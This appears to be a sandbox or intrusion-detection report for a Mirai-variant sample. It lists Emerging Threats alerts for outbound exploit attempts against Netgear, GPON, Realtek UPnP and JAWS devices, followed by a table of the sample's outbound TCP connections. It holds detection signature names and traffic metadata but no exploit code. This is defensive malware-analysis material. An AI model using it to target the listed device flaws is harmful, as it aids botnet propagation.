                                                                  2024-11-28T07:29:05.539100+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342816187.152.16.615555TCP
                                                                  2024-11-28T07:29:05.540240+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350634126.153.201.4680TCP
                                                                  2024-11-28T07:29:05.558674+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350652150.60.134.445555TCP
                                                                  2024-11-28T07:29:05.569910+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233689015.46.179.1775555TCP
                                                                  2024-11-28T07:29:05.588565+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334798211.30.199.2007574TCP
                                                                  2024-11-28T07:29:05.601854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23426421.96.199.12580TCP
                                                                  2024-11-28T07:29:05.601854+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23426421.96.199.12580TCP
                                                                  2024-11-28T07:29:05.784294+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359082189.96.186.1018080TCP
                                                                  2024-11-28T07:29:06.499824+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353716104.127.76.7180TCP
                                                                  2024-11-28T07:29:06.502733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351926165.60.171.1875555TCP
                                                                  2024-11-28T07:29:06.503828+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351524136.134.157.2780TCP
                                                                  2024-11-28T07:29:06.504191+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233536818.11.140.738080TCP
                                                                  2024-11-28T07:29:06.504558+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235052274.49.223.38080TCP
                                                                  2024-11-28T07:29:06.510807+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357550222.26.159.6080TCP
                                                                  2024-11-28T07:29:06.528380+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335772143.127.108.1068080TCP
                                                                  2024-11-28T07:29:06.534832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355684103.248.72.1955555TCP
                                                                  2024-11-28T07:29:06.535206+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233723832.128.238.55555TCP
                                                                  2024-11-28T07:29:06.544084+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355860111.226.30.528080TCP
                                                                  2024-11-28T07:29:06.566122+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235767298.240.104.2458080TCP
                                                                  2024-11-28T07:29:06.587357+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348996110.143.39.11252869TCP
                                                                  2024-11-28T07:29:06.594872+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234919045.139.190.1438080TCP
                                                                  2024-11-28T07:29:06.599966+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341706112.184.37.2980TCP
                                                                  2024-11-28T07:29:06.602510+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335088121.41.156.21349152TCP
                                                                  2024-11-28T07:29:06.603965+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357144200.237.182.2297574TCP
                                                                  2024-11-28T07:29:06.606518+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358956153.188.222.11380TCP
                                                                  2024-11-28T07:29:06.665845+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349574140.158.65.1998080TCP
                                                                  2024-11-28T07:29:06.674921+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234424051.93.70.19780TCP
                                                                  2024-11-28T07:29:06.697874+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336786168.241.230.88080TCP
                                                                  2024-11-28T07:29:06.713198+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359722172.158.193.2268080TCP
                                                                  2024-11-28T07:29:06.759932+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341926171.169.146.1578080TCP
                                                                  2024-11-28T07:29:07.501702+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339196109.43.118.11080TCP
                                                                  2024-11-28T07:29:07.501702+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339196109.43.118.11080TCP
                                                                  2024-11-28T07:29:07.512665+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2357994143.177.72.12752869TCP
                                                                  2024-11-28T07:29:07.516520+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234204892.199.43.1188080TCP
                                                                  2024-11-28T07:29:07.524983+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338390189.55.0.25480TCP
                                                                  2024-11-28T07:29:07.524983+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338390189.55.0.25480TCP
                                                                  2024-11-28T07:29:07.533687+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360792133.54.102.768080TCP
                                                                  2024-11-28T07:29:07.546279+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234565290.197.61.1378080TCP
                                                                  2024-11-28T07:29:07.563149+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235208098.219.179.1575555TCP
                                                                  2024-11-28T07:29:07.566059+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2358578129.107.129.25052869TCP
                                                                  2024-11-28T07:29:07.576297+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351726184.196.160.2078080TCP
                                                                  2024-11-28T07:29:07.590054+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348402130.29.234.8780TCP
                                                                  2024-11-28T07:29:07.590796+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235819864.151.229.1955555TCP
                                                                  2024-11-28T07:29:07.597167+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347828151.249.26.1348080TCP
                                                                  2024-11-28T07:29:07.599357+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234350233.236.32.14480TCP
                                                                  2024-11-28T07:29:07.599357+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234350233.236.32.14480TCP
                                                                  2024-11-28T07:29:07.604497+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354832101.251.159.16780TCP
                                                                  2024-11-28T07:29:07.604497+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354832101.251.159.16780TCP
                                                                  2024-11-28T07:29:07.712636+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2332792135.114.48.838080TCP
                                                                  2024-11-28T07:29:07.790867+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234185286.150.230.14180TCP
                                                                  2024-11-28T07:29:07.838367+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341808175.147.95.2780TCP
                                                                  2024-11-28T07:29:08.501428+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2341880124.95.166.23952869TCP
                                                                  2024-11-28T07:29:08.530757+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355434173.13.157.328080TCP
                                                                  2024-11-28T07:29:08.545711+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234889898.3.111.17380TCP
                                                                  2024-11-28T07:29:08.550980+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337214188.5.181.4180TCP
                                                                  2024-11-28T07:29:08.550980+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337214188.5.181.4180TCP
                                                                  2024-11-28T07:29:08.551392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342422102.116.67.980TCP
                                                                  2024-11-28T07:29:08.551392+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342422102.116.67.980TCP
                                                                  2024-11-28T07:29:08.553665+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23573804.229.116.788080TCP
                                                                  2024-11-28T07:29:08.556257+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2360756119.16.76.13552869TCP
                                                                  2024-11-28T07:29:08.561124+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343372163.144.70.1498080TCP
                                                                  2024-11-28T07:29:08.578664+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333594107.169.43.12580TCP
                                                                  2024-11-28T07:29:08.582747+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345268155.180.226.348080TCP
                                                                  2024-11-28T07:29:08.593395+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340420221.130.16.1380TCP
                                                                  2024-11-28T07:29:08.607699+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334838120.120.252.14952869TCP
                                                                  2024-11-28T07:29:08.610645+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233479233.77.3.1698080TCP
                                                                  2024-11-28T07:29:09.502597+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354254191.195.132.14680TCP
                                                                  2024-11-28T07:29:09.520260+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334774175.73.108.1708080TCP
                                                                  2024-11-28T07:29:09.521017+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333092213.187.115.1828080TCP
                                                                  2024-11-28T07:29:09.521379+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23557623.218.135.11380TCP
                                                                  2024-11-28T07:29:09.545260+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340450215.34.57.1925555TCP
                                                                  2024-11-28T07:29:09.556398+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233786290.52.251.2168080TCP
                                                                  2024-11-28T07:29:09.556773+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23463425.74.176.1305555TCP
                                                                  2024-11-28T07:29:09.559331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335096213.252.65.795555TCP
                                                                  2024-11-28T07:29:09.574718+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234344648.138.159.4880TCP
                                                                  2024-11-28T07:29:09.584906+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360230110.148.234.19749152TCP
                                                                  2024-11-28T07:29:09.585282+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336608159.165.151.1358080TCP
                                                                  2024-11-28T07:29:09.590425+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342540161.166.217.9552869TCP
                                                                  2024-11-28T07:29:09.596128+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347822204.43.222.7352869TCP
                                                                  2024-11-28T07:29:09.608570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342018169.253.246.127574TCP
                                                                  2024-11-28T07:29:09.609391+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234106091.61.95.1248080TCP
                                                                  2024-11-28T07:29:09.721855+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233869080.152.5.1880TCP
                                                                  2024-11-28T07:29:10.503247+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234985089.162.48.2252869TCP
                                                                  2024-11-28T07:29:10.506163+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349236185.72.198.24952869TCP
                                                                  2024-11-28T07:29:10.510961+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340428141.97.17.2508080TCP
                                                                  2024-11-28T07:29:10.541097+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235189270.94.186.1165555TCP
                                                                  2024-11-28T07:29:10.542937+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333572187.253.227.1068080TCP
                                                                  2024-11-28T07:29:10.544297+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348762181.97.41.9280TCP
                                                                  2024-11-28T07:29:10.544660+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235269449.167.186.19080TCP
                                                                  2024-11-28T07:29:10.556514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348494197.190.42.2335555TCP
                                                                  2024-11-28T07:29:10.559101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337780181.247.46.1349152TCP
                                                                  2024-11-28T07:29:10.566163+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345490213.25.64.5749152TCP
                                                                  2024-11-28T07:29:10.595516+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337970153.48.91.168080TCP
                                                                  2024-11-28T07:29:10.697142+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338230118.209.168.118080TCP
                                                                  2024-11-28T07:29:10.728179+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349478163.150.75.778080TCP
                                                                  2024-11-28T07:29:10.775214+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235279416.185.70.748080TCP
                                                                  2024-11-28T07:29:11.400280+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234001073.187.21.11380TCP
                                                                  2024-11-28T07:29:11.512245+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235697267.28.77.20580TCP
                                                                  2024-11-28T07:29:11.512245+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235697267.28.77.20580TCP
                                                                  2024-11-28T07:29:11.532786+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341778151.70.49.17980TCP
                                                                  2024-11-28T07:29:11.543468+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233621852.95.18.14380TCP
                                                                  2024-11-28T07:29:11.543468+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233621852.95.18.14380TCP
                                                                  2024-11-28T07:29:11.547905+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235366455.43.200.24552869TCP
                                                                  2024-11-28T07:29:11.549749+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341628115.81.84.20580TCP
                                                                  2024-11-28T07:29:11.558233+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234579230.254.21.17552869TCP
                                                                  2024-11-28T07:29:11.585768+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233279212.97.253.380TCP
                                                                  2024-11-28T07:29:11.595898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335578117.133.107.18049152TCP
                                                                  2024-11-28T07:29:11.606579+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233446412.19.214.13549152TCP
                                                                  2024-11-28T07:29:11.753465+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235857630.70.91.178080TCP
                                                                  2024-11-28T07:29:11.790790+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23597888.66.52.2108080TCP
                                                                  2024-11-28T07:29:12.449153+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333070210.216.128.1518080TCP
                                                                  2024-11-28T07:29:12.511978+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344776183.87.126.08080TCP
                                                                  2024-11-28T07:29:12.512862+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236095434.170.202.16180TCP
                                                                  2024-11-28T07:29:12.518531+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235747255.176.226.1258080TCP
                                                                  2024-11-28T07:29:12.540111+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23571322.2.202.737574TCP
                                                                  2024-11-28T07:29:12.553962+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234123027.51.44.6480TCP
                                                                  2024-11-28T07:29:12.572748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338532102.23.232.9849152TCP
                                                                  2024-11-28T07:29:12.595258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235569473.109.193.1915555TCP
                                                                  2024-11-28T07:29:12.681512+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234857637.176.230.2380TCP
                                                                  2024-11-28T07:29:12.722260+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2347522168.216.177.23680TCP
                                                                  2024-11-28T07:29:13.139750+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351012188.40.107.1380TCP
                                                                  2024-11-28T07:29:13.507687+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2339324101.138.184.6252869TCP
                                                                  2024-11-28T07:29:13.511690+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355280100.142.210.2407574TCP
                                                                  2024-11-28T07:29:13.561237+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234943215.59.214.2437574TCP
                                                                  2024-11-28T07:29:13.564709+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335498110.123.50.2008080TCP
                                                                  2024-11-28T07:29:13.582171+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234253457.127.194.6252869TCP
                                                                  2024-11-28T07:29:13.588173+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356580108.49.99.1680TCP
                                                                  2024-11-28T07:29:13.596786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349570125.112.19.227574TCP
                                                                  2024-11-28T07:29:14.528605+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234673492.192.162.23180TCP
                                                                  2024-11-28T07:29:14.565630+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359798112.48.44.05555TCP
                                                                  2024-11-28T07:29:14.582090+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2351958134.42.195.11452869TCP
                                                                  2024-11-28T07:29:14.587573+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344646181.20.68.24549152TCP
                                                                  2024-11-28T07:29:14.603650+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233694448.235.98.9380TCP
                                                                  2024-11-28T07:29:14.603650+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233694448.235.98.9380TCP
                                                                  2024-11-28T07:29:14.665925+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2339928103.61.153.1208080TCP
                                                                  2024-11-28T07:29:14.790951+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349378171.191.190.11480TCP
                                                                  2024-11-28T07:29:14.815868+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337800217.160.23.2580TCP
                                                                  2024-11-28T07:29:14.847079+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349696119.179.80.1578080TCP
                                                                  2024-11-28T07:29:15.444769+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348048121.126.110.1625555TCP
                                                                  2024-11-28T07:29:15.503515+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357530175.166.167.20880TCP
                                                                  2024-11-28T07:29:15.503515+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357530175.166.167.20880TCP
                                                                  2024-11-28T07:29:15.507898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234937250.114.132.22180TCP
                                                                  2024-11-28T07:29:15.508628+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360928106.239.233.508080TCP
                                                                  2024-11-28T07:29:15.525558+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233663266.202.254.2528080TCP
                                                                  2024-11-28T07:29:15.550336+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234832621.221.5.2049152TCP
                                                                  2024-11-28T07:29:15.553852+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341082152.141.41.15380TCP
                                                                  2024-11-28T07:29:15.553852+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341082152.141.41.15380TCP
                                                                  2024-11-28T07:29:15.566106+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234529429.139.64.775555TCP
                                                                  2024-11-28T07:29:15.578953+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333818155.239.231.2548080TCP
                                                                  2024-11-28T07:29:15.611410+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234037836.82.170.5980TCP
                                                                  2024-11-28T07:29:15.619050+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23589505.197.254.3580TCP
                                                                  2024-11-28T07:29:15.728325+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233782434.173.168.2480TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 28, 2024 07:27:53.438760996 CET43928443192.168.2.2391.189.91.42
                                                                  Nov 28, 2024 07:27:58.722402096 CET4522280192.168.2.2311.190.108.117
                                                                  Nov 28, 2024 07:27:58.723114014 CET3893480192.168.2.23140.221.39.242
                                                                  Nov 28, 2024 07:27:58.724023104 CET5517037215192.168.2.23178.25.78.182
                                                                  Nov 28, 2024 07:27:58.724678040 CET442088080192.168.2.2373.28.144.173
                                                                  Nov 28, 2024 07:27:58.725346088 CET338627574192.168.2.23113.94.133.170
                                                                  Nov 28, 2024 07:27:58.725995064 CET572465555192.168.2.23119.215.99.156
                                                                  Nov 28, 2024 07:27:58.726640940 CET504768443192.168.2.2390.232.155.185
                                                                  Nov 28, 2024 07:27:58.727299929 CET349568443192.168.2.23111.78.196.116
                                                                  Nov 28, 2024 07:27:58.727952003 CET426565555192.168.2.2326.11.196.70
                                                                  Nov 28, 2024 07:27:58.728574991 CET5338652869192.168.2.2358.189.121.169
                                                                  Nov 28, 2024 07:27:58.729221106 CET3663080192.168.2.23106.152.251.50
                                                                  Nov 28, 2024 07:27:58.729872942 CET372905555192.168.2.2335.200.178.13
                                                                  Nov 28, 2024 07:27:58.730489016 CET5346037215192.168.2.23137.40.92.251
                                                                  Nov 28, 2024 07:27:58.731075048 CET564128080192.168.2.2318.82.236.106
                                                                  Nov 28, 2024 07:27:58.731704950 CET4443480192.168.2.23155.189.226.125
                                                                  Nov 28, 2024 07:27:58.732319117 CET531527574192.168.2.2332.54.226.30
                                                                  Nov 28, 2024 07:27:58.732923985 CET4992680192.168.2.23175.88.224.26
                                                                  Nov 28, 2024 07:27:58.733520031 CET466445555192.168.2.237.29.11.132
                                                                  Nov 28, 2024 07:27:58.734110117 CET5641637215192.168.2.23131.62.122.210
                                                                  Nov 28, 2024 07:27:58.734718084 CET3277037215192.168.2.2370.172.81.219
                                                                  Nov 28, 2024 07:27:58.735327959 CET567867574192.168.2.2355.77.110.137
                                                                  Nov 28, 2024 07:27:58.735928059 CET3426280192.168.2.2330.84.48.130
                                                                  Nov 28, 2024 07:27:58.736546993 CET4946249152192.168.2.23171.23.177.240
                                                                  Nov 28, 2024 07:27:58.737158060 CET3851480192.168.2.2316.1.9.146
                                                                  Nov 28, 2024 07:27:58.737756968 CET424605555192.168.2.2396.204.93.246
                                                                  Nov 28, 2024 07:27:58.738389969 CET3415849152192.168.2.236.205.85.158
                                                                  Nov 28, 2024 07:27:58.739136934 CET5571480192.168.2.23122.248.149.165
                                                                  Nov 28, 2024 07:27:58.740149975 CET3316080192.168.2.23192.97.26.236
                                                                  Nov 28, 2024 07:27:58.741142035 CET554268443192.168.2.23167.233.55.65
                                                                  Nov 28, 2024 07:27:58.741811991 CET370368080192.168.2.23212.35.88.79
                                                                  Nov 28, 2024 07:27:58.742489100 CET345925555192.168.2.2325.75.205.173
                                                                  Nov 28, 2024 07:27:58.743191004 CET4883252869192.168.2.23106.222.158.5
                                                                  Nov 28, 2024 07:27:58.743891954 CET6012880192.168.2.23132.191.123.35
                                                                  Nov 28, 2024 07:27:58.744544029 CET5681680192.168.2.23107.227.55.144
                                                                  Nov 28, 2024 07:27:58.745177031 CET3692280192.168.2.23217.150.215.116
                                                                  Nov 28, 2024 07:27:58.745807886 CET4501280192.168.2.23137.62.189.193
                                                                  Nov 28, 2024 07:27:58.747035027 CET415127574192.168.2.23209.219.134.7
                                                                  Nov 28, 2024 07:27:58.747665882 CET498968080192.168.2.23126.106.74.156
                                                                  Nov 28, 2024 07:27:58.748285055 CET488105555192.168.2.2359.230.90.160
                                                                  Nov 28, 2024 07:27:58.748955965 CET5002480192.168.2.23179.251.32.251
                                                                  Nov 28, 2024 07:27:58.749588013 CET6051480192.168.2.23158.166.4.165
                                                                  Nov 28, 2024 07:27:58.750272036 CET530888080192.168.2.2368.228.150.77
                                                                  Nov 28, 2024 07:27:58.750932932 CET4926280192.168.2.2355.92.215.83
                                                                  Nov 28, 2024 07:27:58.751594067 CET600628443192.168.2.23153.58.49.72
                                                                  Nov 28, 2024 07:27:58.752249956 CET355988080192.168.2.23216.85.193.21
                                                                  Nov 28, 2024 07:27:58.752908945 CET549167574192.168.2.23167.15.35.246
                                                                  Nov 28, 2024 07:27:58.753546953 CET521947574192.168.2.23134.224.138.24
                                                                  Nov 28, 2024 07:27:58.754185915 CET407367574192.168.2.2331.23.54.208
                                                                  Nov 28, 2024 07:27:58.754818916 CET544747574192.168.2.23170.93.179.178
                                                                  Nov 28, 2024 07:27:58.755418062 CET390805555192.168.2.23196.155.214.59
                                                                  Nov 28, 2024 07:27:58.756025076 CET378768080192.168.2.2346.35.54.91
                                                                  Nov 28, 2024 07:27:58.756637096 CET432388080192.168.2.23126.156.202.140
                                                                  Nov 28, 2024 07:27:58.757255077 CET4391680192.168.2.23105.45.143.155
                                                                  Nov 28, 2024 07:27:58.757929087 CET5683452869192.168.2.23152.0.87.200
                                                                  Nov 28, 2024 07:27:58.758606911 CET3299480192.168.2.23198.44.152.160
                                                                  Nov 28, 2024 07:27:58.759200096 CET493347574192.168.2.2375.31.109.126
                                                                  Nov 28, 2024 07:27:58.759759903 CET511285555192.168.2.23170.251.163.52
                                                                  Nov 28, 2024 07:27:58.760389090 CET3654680192.168.2.23217.237.6.188
                                                                  Nov 28, 2024 07:27:58.761118889 CET357648080192.168.2.239.31.4.141
                                                                  Nov 28, 2024 07:27:58.761801958 CET4719652869192.168.2.23100.49.226.162
                                                                  Nov 28, 2024 07:27:58.778570890 CET4199680192.168.2.23161.154.233.90
                                                                  Nov 28, 2024 07:27:58.779274940 CET510908443192.168.2.23205.3.224.6
